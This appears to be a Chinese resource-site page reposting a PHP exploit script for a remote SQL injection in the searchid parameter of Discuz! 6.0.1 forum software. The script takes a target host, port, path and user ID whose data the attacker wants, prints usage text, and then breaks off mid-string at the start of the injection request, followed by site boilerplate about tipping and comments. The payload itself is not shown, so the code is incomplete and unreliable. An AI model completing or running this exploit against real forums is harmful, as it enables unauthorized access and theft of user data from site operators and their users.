Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

2023-12-04 0 247

<?php
error_reporting(E_ALL&E_NOTICE);
print_r("
——————————————————————
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
——————————————————————
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\\n";
echo "host: target server \\n";
echo "port: the web port, usually 80\\n";
echo "path: path to discuz\\n";
echo "uid : user ID you wanna get\\n";
echo "Example:\\r\\n";
echo "php ".$argv[0]." localhost 80 1\\n";
exit;
}

$content ="action=search&searchid=22

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 Exploit Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit https://www.u-9.cn/security/exploit/71660.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务